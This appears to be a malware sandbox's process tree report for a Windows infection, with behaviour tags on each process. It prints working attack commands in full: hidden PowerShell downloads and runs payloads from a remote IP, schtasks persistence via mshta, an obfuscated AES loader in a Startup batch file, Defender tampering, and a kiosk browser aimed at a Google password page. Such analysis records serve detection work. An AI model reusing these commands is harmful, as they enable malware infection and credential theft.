- Checks processor information in registry
- Enumerates system info in registry
PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:26⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:36⤵PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:16⤵
- Uses browser remote debugging
PID:2404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:16⤵
- Uses browser remote debugging
PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:86⤵PID:4424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:16⤵
- Uses browser remote debugging
PID:5700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,18261019115866300261,18441021504295725683,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:16⤵
- Uses browser remote debugging
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\aimyc" & exit5⤵PID:4016
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
PID:4668
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 9644⤵
- Program crash
PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:884 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵PID:5408
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 8166⤵
- Program crash
PID:5280
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵PID:2984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 9686⤵
- Program crash
PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵PID:2612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 9686⤵
- Program crash
PID:2636
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085378101\c4a7457852.exe"C:\Users\Admin\AppData\Local\Temp\1085378101\c4a7457852.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yihc4mawnqD /tr "mshta C:\Users\Admin\AppData\Local\Temp\37g4EEbYm.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:4048 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yihc4mawnqD /tr "mshta C:\Users\Admin\AppData\Local\Temp\37g4EEbYm.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3400
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\37g4EEbYm.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3488 -
C:\Users\Admin\AppData\Local\TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE"C:\Users\Admin\AppData\Local\TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "v49jYmaebfZ" /tr "mshta \"C:\Temp\QpXlbZy5f.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5908
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\QpXlbZy5f.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5984 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:5832
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:3464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 9684⤵
- Program crash
PID:1940
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085385041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵PID:2432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵PID:1920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵PID:5432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
PID:6008
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"4⤵PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"4⤵PID:3400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 9644⤵
- Program crash
PID:4364
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe"3⤵PID:6036
-
-
C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe"3⤵PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"3⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"4⤵PID:5356
-
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"4⤵PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"4⤵PID:5168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 9564⤵
- Program crash
PID:5232
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085390001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1085390001\qFqSpAp.exe"3⤵PID:5632
-
-
C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"3⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"4⤵PID:2844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 9684⤵
- Program crash
PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085392001\5ef6d132b1.exe"C:\Users\Admin\AppData\Local\Temp\1085392001\5ef6d132b1.exe"3⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\1085393001\827472313b.exe"C:\Users\Admin\AppData\Local\Temp\1085393001\827472313b.exe"3⤵PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\1085394001\90b15e851c.exe"C:\Users\Admin\AppData\Local\Temp\1085394001\90b15e851c.exe"3⤵PID:6056
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085395001\d187fda5d2.exe"C:\Users\Admin\AppData\Local\Temp\1085395001\d187fda5d2.exe"3⤵PID:5616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- Kills process with taskkill
PID:6108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- Kills process with taskkill
PID:2516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
PID:704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
PID:4604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:4448
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵PID:5956
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1892 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8313874-fe06-4221-93dc-1b37e4bb2919} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" gpu6⤵PID:2292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ee61fb1-fd3b-433a-a641-47dd24745bc8} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" socket6⤵PID:6080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3208 -prefMapHandle 3176 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c663375-c8d7-45e2-ab18-9e25f182c6a9} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" tab6⤵PID:5680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 1504 -prefMapHandle 1440 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92812644-09b7-4a4b-91f7-2dddfa35846f} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" tab6⤵PID:2088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4328 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4288 -prefMapHandle 4312 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c92d35e-1369-4e76-b91b-bcf1fea9cb5b} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" utility6⤵PID:5904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5104 -childID 3 -isForBrowser -prefsHandle 5204 -prefMapHandle 5216 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {608d380b-d6b5-448c-b847-8beaf2342087} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" tab6⤵PID:6124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5452 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {657f6964-c5c4-40c3-bef8-c2e55b229033} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" tab6⤵PID:3712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5660 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {920adc92-a7b6-4cba-a3ce-4effbcd528ff} 5956 "\\.\pipe\gecko-crash-server-pipe.5956" tab6⤵PID:5796
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085396001\4466860b84.exe"C:\Users\Admin\AppData\Local\Temp\1085396001\4466860b84.exe"3⤵PID:2432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn gvdHGmalW6Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\GnkmDrgzm.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:5952
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn gvdHGmalW6Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\GnkmDrgzm.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1144
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\GnkmDrgzm.hta4⤵PID:5868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VUMMDY1EPWC3XSALISKLZLOEMNCRWGNH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
PID:2064 -
C:\Users\Admin\AppData\Local\TempVUMMDY1EPWC3XSALISKLZLOEMNCRWGNH.EXE"C:\Users\Admin\AppData\Local\TempVUMMDY1EPWC3XSALISKLZLOEMNCRWGNH.EXE"6⤵PID:5820
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1764 -ip 17641⤵PID:4708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2980 -ip 29801⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1016 -ip 10161⤵PID:5068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4160 -ip 41601⤵PID:5008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5104 -ip 51041⤵PID:4172
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5276 -ip 52761⤵PID:1920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5928 -ip 59281⤵PID:3988
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵PID:4668
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1468 -ip 14681⤵PID:5188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4372 -ip 43721⤵PID:3032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5800 -ip 58001⤵PID:5784
-
